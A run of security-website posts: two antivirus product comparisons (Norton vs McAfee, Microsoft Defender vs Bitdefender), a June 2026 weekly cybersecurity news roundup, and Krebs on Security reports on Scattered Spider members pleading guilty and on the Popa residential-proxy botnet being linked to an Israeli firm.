Norton’s standard plan, Antivirus Plus, includes basic AV features for one device. Norton 360 Deluxe is only $10 more expensive per year than Norton 360 Standard; because it adds privacy monitoring and parental controls, it may be worth it to spring for that Deluxe. Finally, Norton 360 with LifeLock is where Norton’s identity monitoring features come into play. For its antivirus and 360 plans, Norton offers a seven-day free trial.

Norton pricing plans.

McAfee Essential offers web browsing protection, VPN, and identity monitoring. McAfee Premium adds data cleanup features. For basic identity needs, McAfee Essential or Premium should be sufficient. But if you want more, McAfee Advanced adds identity theft coverage, credit card transaction monitoring, and credit score updates. McAfee Ultimate has the largest feature bundle, but most users will find that Advanced covers their needs.

McAfee pricing plans.

Better for Core Features: Norton

Norton logo.McAfee logo.AntivirusYesYesAnti-RansomwareYesNoWeb Browsing ProtectionUnclearYesDark Web MonitoringYesYesData CleanupNoYesParental ControlsYesNoWebcam Threat DetectionLimitedNoText Scam DetectionNo YesVisit NortonVisit McAfee

Winner: Both plans offer a comparable number of features, but Norton gets the slight edge in my evaluation for offering customers just a bit more.

Norton 360 offers basic antivirus and ransomware protection, as well as parental controls and dark web monitoring. Norton also offers web browsing protection, but it’s not particularly clear about which product the feature belongs to. If you need to detect or remove rootkits, check out Norton Power Eraser — it’s not part of Norton 360, but it’s a completely free tool. Norton 360 lacks text scam detection, but again, Norton does offer a free detection tool, Genie.

Norton 360 interface.

McAfee’s key features include antivirus, web browsing protection, and dark web monitoring. Other features to highlight are data cleanup, which sends requests to online services to take down your personal information, and text scam detection. McAfee is unclear about ransomware protection features, and it also doesn’t seem to offer ad blocking or anti-tracking. It doesn’t specify which plans offer parental controls.

McAfee Total Protection.

Better for Advanced Features: Tie

Norton logo.McAfee logo.VPNYesYesPassword ManagerYesYesPrivacy ManagementPrivacy monitoringSocial Privacy ManagerIdentity Theft MonitoringYesYesAnti-SpywareNoNoSecurity AssessmentsUnclearNoVisit NortonVisit McAfee

Winner: Norton and McAfee offer comparable integrations and advanced antivirus capabilities.

Norton has a password manager in all of its Antivirus plans, and all the 360 plans also have a VPN. Other nice-to-have features include privacy monitoring and identity theft monitoring. For advanced consumer identity protection, Norton is a great choice — it also offers fraud detection features. Norton doesn’t have spyware protection; I recommend looking at business antivirus products if that’s a priority for you.

Monitoring login safety in Norton.

McAfee’s selection of integrations and advanced features is very similar. Like Norton, the Total Protection plans include a VPN and password manager. McAfee’s Social Privacy Manager is a particularly good option for customers who use social media frequently and want to protect their online presence; I recommend this for freelancers who work with social channels. McAfee also doesn’t offer spyware detection.

McAfee Social Privacy Manager.

Better for Ease of Use & Administration: Norton

Norton logo.McAfee logo.Supported Computer Operating SystemsWindows and macOSWindows and macOSSupported Mobile Operating SystemsiOS and AndroidiOS and AndroidNumber of DevicesUp to 10UnlimitedDocumentationYesLimitedTraining VideosYesNoVisit NortonVisit McAfee

Winner: Norton wins here for its consumer support articles and training videos.

You can install Norton’s antivirus and 360 plans on Windows and Mac computers and iOS and Android devices. The most extensive plan, Norton 360 with LifeLock, supports up to 10 devices. Norton also offers support articles, which provide instructions ranging from VPN installation to renewing an expired subscription. And Norton’s training videos could be especially helpful for users who aren’t as tech-savvy or have never installed an antivirus solution before.

Training videos for Norton users.

McAfee can be installed on Windows and Mac computers and iOS and Android phones, like Norton. Its Advanced and Ultimate plans support unlimited devices for a single user; this is especially helpful for freelancers who use a lot of different devices. I didn’t see much user documentation or training videos in my evaluation of McAfee; it might be a bit more challenging for some users to learn without that extra visual aid.

McAfee supported operating systems.

Better for Customer Support: Norton

Norton logo.McAfee logo.PhoneYesYesEmailYesNoLive ChatYesYes24/7 SupportYesYesCommunity Forum / Support CenterYesYes, but check for outagesVisit NortonVisit McAfee

Winner: Norton’s three support channels gave it the edge in my comparison.

Norton offers phone support and estimates a five-minute wait for calls. It also has email and live chat options; live chat is reportedly available 24/7. Providing all three major support channels is impressive, particularly for a consumer product. Norton has a support community forum as well; users can submit questions or issues they’re having with their products, and other users or Norton experts can answer.

Norton Help Center.

McAfee’s main support channels are phone and live chat. Both are available 24/7. While McAfee doesn’t appear to offer email support, phone and live chat tend to be faster channels and more useful in outages or emergencies. McAfee does seem to have an online support community, but it’s currently taken down for improvements without a clear end date, so take that into consideration if an active forum is important to you.

McAfee customer support options.

Who Shouldn’t Use Norton or McAfee

Norton and McAfee are both strong antivirus options for consumers and freelancers. But they aren’t the best fit for all users, especially businesses.

Who Shouldn’t Use Norton?

Consider other antivirus tools if you’re one of the following:

  • Users looking for anti-spyware or anti-tracking: Consider other antivirus or device protection products if you need spyware or tracking protection.
  • Small or large businesses: While freelancers and contractors will benefit from Norton’s protection, it’s not designed for multiple users.
  • Families with more than three users: Norton 360 with LifeLock only supports 10 devices, and Norton 360 doesn’t offer a family-specific plan.

Who Shouldn’t Use McAfee?

Look at other options if you fall into one of these categories:

  • All businesses: While McAfee offers business protection for five users, it’s marketed as being for Dell products and won’t support anything larger than a few employees.
  • Parents who want to manage kids’ security: McAfee doesn’t have parental controls in its Total Protection plans.
  • Users looking for walk-through videos: McAfee doesn’t offer much in the way of training videos, so users that need a visual walkthrough may have a little trouble.

Top 3 Alternatives to Norton & McAfee

If neither Norton nor McAfee sound like the right fit for you, check out one of the following solutions instead. Bitdefender, PC Matic, and Malwarebytes all offer comparable antivirus plans.

Bitdefender logo.PC Matic logo.Malwarebytes logo.Pricing• Individual: $59.99/year (5 devices)
• Family: $84.99/year (25 devices)• Security: $50/year (5 devices)
• Personal: $100/year (5 devices)
• Family: $199/year• Individual: $4.17/month (2 devices)
• Duo: $6.67/month (5 devices)
• Family: $10.83/month (10 devices)Ransomware PreventionYesYesYesVPNYesYesNoIdentity Monitoring/ProtectionLimited — data breach detectionYesNoVisit BitdefenderVisit PC MaticVisit Malwarebytes

Bitdefender Total Security

Bitdefender Total Security is an anti-malware solution for individuals and families. Its features include ransomware protection, scam prevention, and cryptomining protection. Like Norton and McAfee, Bitdefender also offers a VPN and a password manager through Total Security.

Visit Bitdefender Total Security

The Individual plan supports up to 5 devices and costs $59.99 per year. The Family plan supports up to 5 accounts and 25 devices total and costs $84.99 per year. Total Security can be installed on Windows, macOS, iOS, and Android.

Bitdefender interface.

PC Matic

PC Matic is an antivirus and endpoint security solution for both individual users and families. It offers features like malware protection, a VPN, and identity theft protection. PC Matic also provides 24/7 phone support.

Visit PC Matic

PC Matic’s Security plan offers the most basic protection – antivirus and anti-malware – for $50 per year and up to five devices. The Personal plan, at $100 per year, covers all of a single user’s devices and adds identity theft protection. The Family plan protects every household device and costs $199 per year. PC Matic is a bit more expensive than Norton and McAfee, but supporting large families sets it apart.

PC Matic interface.

Malwarebytes Premium

Malwarebytes Premium is a device protection and scam prevention solution for both individuals and families. It offers protection from virus, ransomware, Trojans, and spyware, as well as scam protection from texts and phishing accounts.

Visit Malwarebytes Premium

Malwarebytes’ Individual plan supports two devices and starts at $4.17 per month, billed annually. The Duo plan, for two users, supports five devices and starts at $6.67 per month. Finally, the Family plan includes up to 10 of your family’s devices for $10.83 per month. Malwarebytes is also a bit more expensive than Norton and McAfee, so keep that in mind while shopping.

Malwarebytes interface.Image credit: Amazon

How I Compared Norton & McAfee

I used a product scoring rubric, which had five key categories, to compare Norton and McAfee. The five categories covered major criteria of antivirus solutions, and I weighted each based on importance. Each category also had multiple subcriteria, like individual features, which received their own weighting. My rubric examined Norton and McAfee’s pricing plans, major AV features, advanced capabilities, overall usability, and customer support options.

Pricing – 20%

I looked at Norton and McAfee’s pricing plans, from basic options with a smaller selection of features to more comprehensive options. I also scored them based on the availability and length of a free product trial.

Core Features – 30%

I evaluated Norton and McAfee based on their selection of consumer security features, including antivirus and ransomware prevention but also additional options like dark web monitoring and scam detection. I also looked at features like parental controls and anti-tracking.

Advanced Features & Integrations – 15%

I considered advanced security features like anti-spyware, device assessments, and identity theft monitoring. Additionally, I scored Norton and McAfee based on the availability of VPNs and password managers, which consumer antivirus software often provides. 

Ease of Use & Administration – 20%

I evaluated administrative features, including the operating systems Norton and McAfee support, and also looked at the number of devices each plan supports. Then I considered whether training videos and product documentation were available.

Customer Support – 15%

I scored Norton and McAfee based on the number of support channels they offered, including email, phone, and live chat. Additionally, I looked at the hours the support team was available and whether the vendors offered a customer forum or support center.

Frequently Asked Questions (FAQs)

What is the difference between Norton and McAfee?

Norton focuses on comprehensive antivirus protection, ransomware defense, identity monitoring, and strong customer support, while McAfee emphasizes privacy management with features such as data cleanup, social media privacy controls, and unlimited device protection on select plans.

Which antivirus is better: Norton or McAfee?

For most users, Norton is the better overall choice due to its stronger ransomware protection, more extensive support resources, and higher overall usability. McAfee is a good option for users who prioritize privacy features and online identity management.

Do Norton and McAfee include a VPN?

Yes. Both Norton 360 and McAfee Total Protection include a VPN with many of their subscription plans, helping secure internet traffic when using public or unsecured networks.

Which antivirus offers better identity protection?

Both products include identity monitoring, but Norton offers more comprehensive identity protection and credit monitoring options through higher-tier plans such as Norton 360 with LifeLock. McAfee focuses more on privacy monitoring and personal data cleanup.

Which antivirus supports more devices?

McAfee supports unlimited devices with its Advanced and Ultimate plans, making it a better choice for users with many personal devices. Norton supports between one and ten devices depending on the subscription tier.

Is Norton or McAfee better for families?

Norton is generally the better choice for families because it includes parental controls, dark web monitoring, password management, and identity protection features. McAfee’s consumer plans do not include the same level of parental control functionality.

What are good alternatives to Norton and McAfee?

Popular alternatives include Bitdefender Total Security, PC Matic, and Malwarebytes Premium. Each offers a different combination of malware protection, ransomware defense, VPN services, and identity protection depending on your budget and security requirements.

Bottom Line: Norton vs McAfee

Norton and McAfee are both good antivirus solutions for consumers, particularly freelancers looking to secure multiple devices. Norton is great if you’re looking for plenty of support channels, and it also provides helpful tools like videos if you’re worried about learning to use the solution. McAfee is an especially strong choice for individuals working in social media or consumers who want to better protect their online presence.

If your small business is looking for an antivirus solution, I’d recommend checking out these top business AV products for options more suitable for teams.

This article was published in November 2024 and last updated in June 2026.

The post Norton vs McAfee: Compare Antivirus Software in 2026 appeared first on eSecurity Planet.

Massive Breaches, AI Risks, and Critical Vulnerabilities Define This Week in Cybersecurity in June 2026

eSecurity Planet Jun 26, 2026 · 16:02

Major Threats & Vulnerabilities

Critical Software and Hardware Exploits

The FFmpeg PixelSmash vulnerability was disclosed this week, allowing remote code execution (RCE) through malicious video files. The flaw, found in the MagicYUV decoder, can trigger automatically during thumbnail generation. Users are urged to patch immediately and audit systems for exposure.

Apple devices were also affected by a hardware-level flaw known as the usbliter8 SecureROM exploit, which enables code execution before iOS security controls load. The unpatchable nature of this vulnerability highlights persistent hardware security challenges.

Supply Chain and Repository Risks

A new Cordyceps vulnerability was identified, enabling attackers to hijack software repositories and inject malicious code into build pipelines. The flaw affects thousands of open-source and enterprise projects, underscoring the importance of dependency integrity and CI/CD security.

Researchers also uncovered over 10,000 GitHub repositories distributing malware through cloned projects containing Trojan-infected ZIP files. Developers are advised to verify repository authenticity and implement code-signing practices.

Cloud and AI Exploits

An AWS phishing kit was found stealing credentials and MFA codes by spoofing AWS login pages. The campaign, targeting software engineers, demonstrates the sophistication of adversary-in-the-middle attacks against cloud environments.

Meanwhile, a Microsoft 365 Copilot flaw dubbed “SearchLeak” exposed sensitive data through prompt injection and SSRF vulnerabilities. Microsoft has patched the issue, but organizations should review Copilot permissions and data access scopes.

AI ecosystems also faced scrutiny as researchers warned of AI plugin trust risks. Unofficial ClawHub plugins were found capable of executing code and accessing APIs, emphasizing the need for publisher verification and plugin provenance checks.

Malware and Ransomware Campaigns

The FlutterShell macOS malware emerged as a new stealthy backdoor using the Flutter framework to evade detection. It hides within signed applications and activates only upon attacker command, bypassing Apple’s Gatekeeper protections.

The Prinz Eugen ransomware variant was observed prioritizing recently modified files for encryption, increasing the risk to active data and backups. Security teams should ensure frequent, immutable backups and test recovery procedures.

Network and IoT Threats

The AryStinger botnet compromised over 4,000 outdated D-Link routers using legacy vulnerabilities. The infected devices were converted into proxies and later expanded to target NAS systems, highlighting the dangers of unsupported hardware.

Industry News

Major Data Breaches

The Madison Square Garden breach exposed 26 million visitor records, including contact and facial recognition data. The incident has prompted legal scrutiny over biometric data retention practices.

Healthcare provider Xsolis suffered a phishing-related breach compromising 1.4 million patient records. The event underscores persistent third-party risks in healthcare supply chains.

A supply chain attack on LastPass via Klue exposed Salesforce data after attackers used stolen OAuth tokens. A related Klue breach also impacted multiple cybersecurity firms, revealing the cascading risks of third-party integrations.

Tata Electronics confirmed a breach exposing sensitive Apple and Tesla manufacturing data, while a Texas government vendor incident leaked personal data of over 3 million residents.

Researchers also uncovered a massive database containing 24 billion stolen credentials. Although taken offline, the data remains a major risk for credential-stuffing attacks.

Infrastructure and OT Security

Five years after the Colonial Pipeline incident, OT security gaps persist across critical infrastructure. Limited visibility between IT and OT networks continues to expose industrial systems to potential disruption.

AI and Cloud Security Initiatives

OpenAI’s Patch the Planet initiative launched this week, partnering with Trail of Bits and HackerOne to help open-source maintainers identify and fix vulnerabilities using AI-driven analysis.

Google DeepMind introduced new guardrails for AI agents, including access restrictions, monitoring, and emergency shutdown capabilities to prevent misuse.

Meanwhile, AI builder culture is creating new security gaps as employees rapidly adopt generative tools without oversight, expanding the attack surface across organizations.

Law Enforcement and Biometrics

Authorities are increasingly using biometric technologies to identify trafficking victims and detect fraudulent documents during major events. Experts recommend combining biometrics with intelligence sharing and cybersecurity monitoring for maximum effectiveness.

Security Tips & Best Practices

Are Your Cloud Defenses Ready?

  • Require phishing-resistant MFA and enforce least-privilege access.
  • Use a Cloud-Native Application Protection Platform (CNAPP) for unified cloud security management.
  • Monitor cloud activity logs, encrypt sensitive data, and remediate misconfigurations promptly.

Can You Trust Your Dependencies?

  • Maintain SBOMs and continuously monitor third-party risk.
  • Use DevSecOps tools for dependency scanning, auditing CI/CD workflows, and validating build process integrity.
  • Digitally sign software releases and enforce least-privilege permissions.

Secure Your Small Business

  • Enable phishing-resistant MFA and use password managers to reduce account compromise risk.
  • Keep software updated, segment networks, and use privileged access management tools.
  • Regularly back up data and train employees on security awareness.

Mitigate Third-Party and Ransomware Risks

  • Conduct continuous third-party risk assessments and tabletop exercises.
  • Run recovery tests on recently modified files to ensure backup resilience.
  • Audit networks for unsupported routers and replace end-of-life hardware.
  • Search web server logs for suspicious requests and rotate compromised credentials.

Secure AI Agents Before They Act

  • Apply least-privilege access to AI agents and require human approval for high-risk actions.
  • Establish AI governance with audit logging, continuous monitoring, and behavior reviews.
  • Use sandboxed environments to test agents, monitor for prompt injection, and maintain emergency shutdown capabilities.

Tools & Resources

Simplify complianceget ready-to-use security policies to help protect your business without the cost or complexity of an enterprise, all for under $100.

OpenAI’s Patch the Planet provides a valuable resource for open-source maintainers seeking to identify and remediate vulnerabilities using AI analysis.

Organizations can also reference Google DeepMind’s AI agent security roadmap to implement governance and control frameworks for autonomous systems.

Finally, as AI-driven vulnerability discovery accelerates, security teams should invest in automated patch management and risk-based prioritization tools to keep pace with the growing threat landscape.

If you want to see more from our Newsletter Archive please click here.

The post Massive Breaches, AI Risks, and Critical Vulnerabilities Define This Week in Cybersecurity in June 2026 appeared first on eSecurity Planet.

Microsoft Defender vs Bitdefender: Compare Antivirus Software in 2026

eSecurity Planet Jun 26, 2026 · 15:59

This guide is for IT leaders, security teams, and small business decision-makers comparing Microsoft Defender and Bitdefender for endpoint and email security in 2026. It reviews pricing, features, ease of use, customer support, and ideal use cases to help you determine which antivirus platform best fits your organization’s needs.

Key points about Microsoft Defender vs Bitdefender in 2026

  • Microsoft Defender is a better fit for larger small and midsize businesses (SMBs), especially organizations already using Microsoft 365, thanks to its lower per-user pricing and scalability.
  • Bitdefender Small Business Security is designed for smaller teams and stands out with built-in identity protection, a VPN, and a password manager.
  • Both solutions provide endpoint and email security, but Microsoft offers stronger Microsoft ecosystem integration while Bitdefender provides broader protection for non-Microsoft environments.
  • Microsoft Defender offers lower entry-level pricing, while Bitdefender’s per-user costs become more competitive as team sizes increase.
  • Your choice should depend on business size, existing IT infrastructure, supported operating systems, and the security features your organization needs most.

Microsoft Defender and Bitdefender are two popular small business security providers with multiple products for small teams.

Microsoft Defender can protect your office solutions, like Word and Teams, and business endpoint devices. Bitdefender performs vulnerability scans on your devices and protects your email accounts.

Pricing and product offerings may change over time; always check the vendor’s official website for the latest pricing, licensing, and feature information before making a purchasing decision.

I’ve compared both solutions to help you decide which is a better fit for your small business. 

  • Microsoft Defender: Better for large SMBs and overall business needs (starts at $2.00 per user per month)
  • Bitdefender: Better for startups with over 10 employees, identity protection needs, and built-in VPN (starts at $6.33 per user per month)
{"slug":"antivirus-software","count":"3","layout_id":37376,"layout":"featured","traction_data":[],"headline":" Featured Partners: Antivirus Software","show_product_name":"yes","show_product_logos":"yes","show_cta_buttons":"yes","placement":"grid-extended"}

Featured Partners Featured Partners: Antivirus Software

Visit Website Good For Employees per Company Size Micro (0-49), Small (50-249), Medium (250-999), Large (1,000-4,999), Enterprise (5,000+) Micro, Small, Medium Sized Companies Core Features Lorem ipsum, dolor, sit amet, consectetur, adipiscing, and more Integrations Lorem ipsum, dolor, sit amet, consectetur, adipiscing, and more

eSecurity Planet may receive a commission from merchants for referrals from this website

Microsoft Defender overview

Overall rating: 3.7/5

  • Pricing: 4.4/5
  • Features: 3.4/5
  • Ease of use and administration: 3.8/5
  • Customer support: 3.7/5

Microsoft Defender is an endpoint and email security suite of products for small to medium-sized businesses. It offers features like next-gen antivirus, vulnerability management, and endpoint detection and response (EDR). Microsoft Defender for Business is for teams with up to 300 users; however, I recommend Defender for Endpoint if your organization is larger than 300 or plans to scale rapidly. Defender for Office 365 includes email security for SMBs.

Bitdefender overview

Overall rating: 3.4/5

  • Pricing: 3.8/5
  • Features: 3/5
  • Ease of use and administration: 3.4/5
  • Customer support: 4/5

Bitdefender Small Business Security is a device and email protection product that helps protect users from scams. Its features include identity protection features, a VPN, and a password manager. Bitdefender Small Business Security is designed for SMBs with 25 users or fewer, so if you have more employees, I recommend checking out Bitdefender GravityZone instead. 

If you’re interested in learning more, read our guide to using Bitdefender next. 

Better for pricing: Microsoft

Free Trial90 days Only 30-day money-back guaranteeLeast Expensive PlanDefender for Office (Plan 1): $2.00/user/month3 users: $189.99/yearMid-Range PlanDefender for Business: $3.00/user/monthDefender for Office 365 (Plan 2): $5.00/user/month5 users: $269.99/year10 users: $399.99/yearMost Expensive PlanDefender Business Premium: $22/user/month25 users: $799.99/yearVisit MicrosoftVisit Bitdefender

Microsoft Defender has relatively low monthly pricing: Plan 1 starts at $2.00 per user when billed annually. Plan 2, which adds phishing protection, a terabyte of cloud storage, and multi-factor authentication, starts at $5.00 per user per month. I recommend that larger SMBs with 100-200 employees purchase Defender, since it has inexpensive per-user pricing.

Bitdefender’s pricing begins on the high end, particularly for 3 and 5-user plans. For only 3 users, you’ll pay $189.99 per year, which comes out to around $63 per user; but if you pay for 25 users, you’ll only pay about $32 per user per year. Remember that the Small Business Security product is only for teams with up to 25 users, but it can be a great fit for startups with limited staff.

Better for features: Tie

Endpoint ProtectionYesYesDashboardYesYesAnti-MalwareYesNoWeb Browsing ProtectionUnclearUnclearIdentity ProtectionLimitedYesVisit MicrosoftVisit Bitdefender

Microsoft Defender’s feature set includes endpoint protection, threat remediation, and antivirus. Aside from those, Microsoft offers email protection from phishing and data loss prevention in the Defender Business Premium plan. Web browsing protection and ad blocking are where Defender falls a bit short — it’s not clear whether the products offer those common antivirus features. 

Bitdefender’s SMB security features include identity exposure protection, a VPN, and a password manager. Like Microsoft, Bitdefender doesn’t appear to have much web browsing or ad-blocking functionality, which is one reason it didn’t score as well in my antivirus analysis. But it’s still a solid option for startups looking for basic business security scans and email protection.

SEE: Antivirus Policy (TechRepublic Premium)

Better for ease of use and administration: Microsoft

Desktop Operating SystemsmacOS, Windows, Linux ServermacOS, WindowsMobile Operating SystemsAndroid, iOSAndroid, iOSUser Documentation/Knowledge BaseYesYesTraining VideosNoNoVisit MicrosoftVisit Bitdefender

Microsoft’s supported operating systems include macOS, Windows, Android, iOS, and Linux Server. Microsoft has some of the best user documentation in the industry, with plentiful and well-designed knowledge base articles. One area where Microsoft lacks is in training videos for the Defender for Business and Defender for Office products; I didn’t see any good options provided by Microsoft itself. 

Bitdefender supports macOS, Windows, iOS, and Android operating systems. However, Small Business Security doesn’t currently support Linux. Bitdefender has multiple help center articles, but like Microsoft, I didn’t see any solid how-to video options for customers. Bitdefender also received a slightly lower score in this category because the SMB Security product didn’t have sufficient customer review presence or ratings, which was one of my subcriteria for ease of use. 

Better for customer support: Bitdefender

Hours AvailableUnclear24/7PhoneYesPossibly EmailNoYesLive ChatYesYesProduct DemoNoNoVisit MicrosoftVisit Bitdefender

Microsoft has phone and live chat support channels for its business customers. It’s less clear whether email responses are available from the support team. Microsoft’s community is also available to customers, where they can participate in discussions and ask questions about their products.

Bitdefender offers its customers email and chat support channels. It also has a customer forum where users can post questions and join discussions. While it’s not clear whether Bitdefender Small Business Security falls under the business support model, Bitdefender does offer phone support for enterprise customers. However, you may have better access to this with GravityZone instead. 

Top 3 alternatives to Microsoft Defender and Bitdefender

Microsoft Defender and Bitdefender are good antivirus and email security solutions for small businesses, but they may not fit your team best. Consider Norton, McAfee, or Trend Micro if you’re interested in other options. 

Norton Security

Norton Security’s plans for SMBs are ideal for single offices and startups. The Small Business plan includes secure browsing, an encrypted vault for passwords and credit cards, and dark web monitoring. Small Business Premium adds 24/7 support for customers and social media account monitoring. 

The Small Business plan starts at $79.99 for three employees, and Small Business Premium starts at $199.99 per year for up to five employees. Each plan is capped at 10 users, so if you have more employees, check out Trend Micro instead. 

McAfee

McAfee Business Protection is a software solution available on Dell computers. Up to five users can download the software, so it’s a good option for small startups with only a few team members. Features include a VPN, identity monitoring, anti-phishing, and threat protection.

McAfee does not provide a public pricing page for the Business Protection software. Contact McAfee to ask for costs for the Dell software subscription.  

Read our comparison of Bitdefender and McAfee if you’re debating between the two products. 

Trend Micro 

If your business has more employees, check out Trend Micro’s Worry Free Services. This suite of endpoint and email security includes file analysis, data loss prevention, and disc encryption. If you need advanced security, Worry Free offers extended detection and response (XDR) services. 

Trend Micro doesn’t provide public pricing for the Worry Free Services Suite. Contact Trend Micro for annual pricing and user limits.

How I compared Microsoft Defender and Bitdefender

To compare Microsoft Defender and Bitdefender, I created a product review rubric with four major categories: pricing, features, ease of use and administrative features, and customer support. Each category was weighted based on its importance, and I assigned multiple subcriteria to each category, which were also weighted individually. 

How well each product met each of the subcriteria determined its category score:

  • Pricing winner: Microsoft (4.4/5 stars)
  • Features winner: Microsoft (3.4/5 stars)
  • Ease of use and administration: Microsoft (3.8/5 stars)
  • Customer support: Bitdefender (4/5 stars) 

Frequently Asked Questions (FAQs)

What is the difference between Microsoft Defender and Bitdefender?

Microsoft Defender is tightly integrated with Microsoft 365 and Windows environments, making it well suited for organizations already invested in Microsoft’s ecosystem. Bitdefender focuses on comprehensive endpoint protection with features like identity protection, VPN access, and password management for small businesses.

Which solution is better for small businesses?

It depends on your environment. Microsoft Defender is generally the better choice for larger SMBs or Microsoft-centric organizations, while Bitdefender Small Business Security is a strong option for startups and businesses with up to 25 users that want built-in privacy and identity protection features.

Does Microsoft Defender include endpoint detection and response (EDR)?

Yes. Microsoft Defender for Business includes endpoint detection and response (EDR), vulnerability management, and next-generation antivirus capabilities. Larger organizations can upgrade to Microsoft Defender for Endpoint for additional enterprise-scale functionality.

Does Bitdefender include a VPN?

Yes. Bitdefender Small Business Security includes a VPN along with identity protection and a password manager, providing additional security beyond traditional antivirus capabilities.

Which product offers better pricing?

Microsoft Defender generally provides lower per-user pricing, particularly for organizations with larger user counts and it’s typically included with Windows operating system. Bitdefender’s pricing becomes more cost-effective as organizations approach its maximum supported team size, but it is intended for businesses with 25 users or fewer.

Which solution supports more operating systems?

Microsoft Defender supports Windows, macOS, Android, iOS, and Linux Server. Bitdefender Small Business Security supports Windows, macOS, Android, and iOS but does not currently support Linux.

What are good alternatives to Microsoft Defender and Bitdefender?

Popular alternatives include Norton Small Business, McAfee Business Protection, and Trend Micro Worry-Free Services. These solutions offer different pricing models, deployment options, and security capabilities depending on your organization’s size and requirements.

Bottom line: Microsoft Defender vs Bitdefender

Microsoft Defender and Bitdefender each offer antivirus and email security solutions for small businesses, but they have different audiences. 

Microsoft is a better choice for larger SMB teams, especially those who already use Microsoft’s solutions. It protects many more team members than Bitdefender. Bitdefender is more suitable for small businesses with 15-20 employees, as well as teams that need to protect other email platforms like Gmail — Defender for Office 365 secures Microsoft Office products, while Bitdefender can protect a larger range of software. If neither sounds like a good fit, read our guide to the best antivirus solutions for a couple more options.

This article was published in May 2025 and last updated in June 2026.

The post Microsoft Defender vs Bitdefender: Compare Antivirus Software in 2026 appeared first on eSecurity Planet.

Scattered Spider Hackers Plead Guilty on Day 1 of Trial

Krebs on Security Jun 23, 2026 · 18:12

Two men pleaded guilty in the United Kingdom this week to criminal charges stemming from an August 2024 cyberattack that crippled Transport for London, the entity responsible for the public transport network in the Greater London area. The duo were key members of a prolific cybercrime group known as Scattered Spider, and their guilty pleas came on the first day of what was expected to be a six-week trial.

Owen Flowers (left) 18, and Thalha Jubair, 20. Image: UK National Crime Agency (NCA).

Thalha Jubair, 20, of East London and 18-year-old Owen Flowers of Walsall admitted conspiring to commit unauthorized acts against Transport for London computer systems and causing risk of serious damage to human welfare. According to a report from the BBC, Flowers alone admitted to being part of a conspiracy to hack into U.S. based healthcare providers SSM Health Care Corporation and Sutter Health in September 2024.

Jubair is also wanted by U.S. law enforcement agencies. In September 2025, prosecutors in New Jersey unsealed an indictment alleging Jubair and other Scattered Spider members committed computer fraud, wire fraud, and money laundering in relation to 120 computer network intrusions involving 47 U.S. entities between May 2022 and September 2025, and that the group’s victims paid at least $115 million in ransom payments.

In July 2025, KrebsOnSecurity reported that Flowers and Jubair were arrested in the United Kingdom in connection with Scattered Spider ransom attacks against the retailers Marks & Spencer and Harrods, and the British food retailer Co-op Group. Multiple sources familiar with those investigations said Flowers was the Scattered Spider member who anonymously gave interviews to the media in the days after the group’s September 2023 ransomware attacks disrupted operations at Las Vegas casinos operated by MGM Resorts and Caesars Entertainment.

According to prosecutors, Jubair co-ran a bustling Telegram channel called Star Chat, the home of a SIM-swapping group that used voice- and SMS-based phishing attacks to steal credentials from employees at the major wireless providers in the U.S. and U.K. The group would then use that access to sell a service that could redirect a target’s phone number to a device the attackers controlled and intercept the victim’s calls and text messages (including one-time codes for multi-factor authentication).

A receipt from Star Fraud Chat’s SIM-swapping service targeting a T-Mobile customer after the group gained access to internal T-Mobile employee tools. “Rocket Ace” was one of Jubair’s hacker handles, according to U.S. prosecutors.

New Jersey prosecutors also allege Jubair also was involved in a mass SMS phishing campaign during the summer of 2022 that stole single sign-on credentials from employees at hundreds of companies. That weeks-long SMS phishing campaign led to intrusions and data thefts at more than 130 organizations, including LastPassDoorDashMailchimpPlex and Signal.

KrebsOnSecurity reported last year that one of Jubair’s alter egos at age 15 was “Everlynn,” a hacker who sold fraudulent “emergency data requests” that used compromised police and government email addresses to demand subscriber data (e.g. username, IP/email address) from major tech companies, claiming the requests concerned urgent matters of life and death and could not wait for a court order.

In April 2026, 24-year-old British national and Scattered Spider member Tyler “Tylerb” Buchanan pleaded guilty to wire fraud conspiracy and aggravated identity theft for participating in the group’s SMS phishing spree in the summer of 2022. The government said Buchanan, Jubair and others used the credentials harvested in that phishing campaign to steal at least $8 million in cryptocurrency from victims throughout the United States. Buchanan is currently scheduled to be sentenced on October 2.

In August 2025, 20-year-old Scattered Spider member from Florida named Noah Michael Urban was sentenced to 10 years in federal prison and ordered to pay $13 million in restitution, after pleading guilty to charges of wire fraud and conspiracy.

The U.S. Department of Justice says three alleged Scattered Spider defendants indicted along with Buchanan still face charges, including Ahmed Hossam Eldin Elbadawy, 24, a.k.a. “AD,” of College Station, Texas; Evans Onyeaka Osiebo, 21, of Dallas, Texas; and Joel Martin Evans, 26, a.k.a. “joeleoli,” of Jacksonville, North Carolina.

Flowers and Jubair are slated to be sentenced in a London court on July 15, 2026.

‘Popa’ Botnet Linked to Publicly-Traded Israeli Firm

Krebs on Security Jun 18, 2026 · 19:37

For the past four years, a sprawling Android-based botnet called Popa has forced millions of consumer TV boxes to relay Internet traffic linked to advertising fraud, account takeovers, and mass data-scraping efforts. This week, researchers from multiple security firms concluded that the Popa botnet is linked to NetNut, a “residential proxy” provider operated by the publicly-traded Israeli firm Alarum Technologies Ltd [NASDAQ: ALAR].

Malicious streaming devices sold online that enroll the user's home Internet address in a residential proxy service. Image: Synthient. Pictured are 8 different TV boxes, including the X96 Mini Box, stick, and other no-name brands.

Malicious streaming devices sold online that enroll the user’s home Internet address in a residential proxy service. Image: HUMAN Security.

Popa is a massive botnet, but by all accounts it is unlike traditional botnets that enlist compromised systems in destructive activities, such as coordinating huge distributed denial-of-service attacks. Rather, Popa appears designed with a singular purpose: Implementing a persistent communications layer capable of registering a device, maintaining long-lived encrypted connections, and opening communication tunnels on demand.

Experts say Popa is a plugin component associated with the Vo1d botnet, a large-scale malware campaign targeting unofficial Android-based TV boxes. These devices, which are marketed under thousands of brand names and model numbers and broadly available for purchase at top e-commerce destinations, all advertise the ability to stream hundreds of subscription video services for an up front one-time fee.

But as the FBI and security industry experts have warned repeatedly, these streaming boxes typically bundle or come pre-installed with software that turns the user’s TV into a “residential proxy” — allowing anyone to route their Internet traffic through that device for as long as it remains plugged into a wall socket and connected to a local network. More concerning, some of these proxy networks do little to stop malicious customers from communicating with and even compromising systems on the local network of the unsuspecting device owner.

The first clues about Popa’s origins came in a 2025 report from the Chinese security company XLAB, which flagged at least nine domain names that were used to register and direct the activities of compromised devices. In a report released today, the security firm Qurium described how it stumbled on some of those same domains while investigating a series of disruptive and expensive data scraping events targeting the company’s hosted organizations in May 2026, in which the scraping activity was scattered evenly across more than 1.4 million Internet addresses.

